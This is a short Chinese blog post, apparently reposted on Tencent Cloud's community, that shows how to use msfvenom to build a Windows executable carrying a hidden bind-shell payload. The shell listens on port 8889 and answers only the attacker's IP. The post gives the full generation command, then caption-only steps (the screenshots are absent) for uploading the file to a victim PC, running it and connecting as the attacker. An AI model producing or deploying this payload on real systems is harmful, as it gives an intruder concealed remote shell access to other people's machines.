MSF 通过ACL隐藏Bind Shell
[sourcecode language="plain"]root@kali:~# msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.52.129 -f exe > hidden_shell.exe[/sourcecode]
AHOST 就是攻击者的IP:
将exe上传至受害者PC并运行:
这里端口已经开了。
在同段下其他机器连接该端口:
攻击者连接:
本文分享自 作者个人站点/博客 前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!